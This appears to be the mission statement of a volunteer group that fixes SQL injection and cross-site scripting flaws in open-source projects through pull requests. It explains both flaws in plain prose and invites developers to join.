Web developers are almost entirely self-taught; even if they attended university for a computer science degree, it is almost certain they never had a course teach them about XSS or SQL injection.
We aim to seek out developers who are unwittingly making fatal mistakes, and educate them so they may continue on a path towards being a great programmer.
Because examples are the best way to educate, our lessons take the form of pull requests - it is only through the combined background information and concrete example we may expect results.
Every now and then someone points out that Github's code search can be used to find many extremely vulnerable programs. The reaction is usually 95% "glad I'm not that stupid" and 5% "look at me taking advantage of them".
As a community of professionals, we're better than that. We should recognize that most errors come from ignorance, not lack of intelligence, and attack the problem as such. Plus, being mean is just not cool. Don't be a dick.
Allowing user data to leak into your database queries unfiltered, so an attacker can perform arbitrary commands on your database.
See bobby-tables.com for more information on how to avoid this in different languages.
A cross-site-scripting vulnerability allows an attacker to execute arbitrary Javascript on your site when your users visit a particular page. They can use this for a number of attacks; for instance, sending off users' sessions to a remote server, where the attacker can collect them and use them to log in as the user.
Interested in helping? Open an issue on the volunteers repository and we'll add you to the organization. Please list any language-groups you'd like to be a part of (e.g. PHP) if you'd like to get pinged periodically for advice.
Once you're a part of the organization, find a project with a problem and fork it to PEF. Fix the problem, send in a pull request, and feel good about yourself. See our first pull request for an example of the type of thing we're looking for.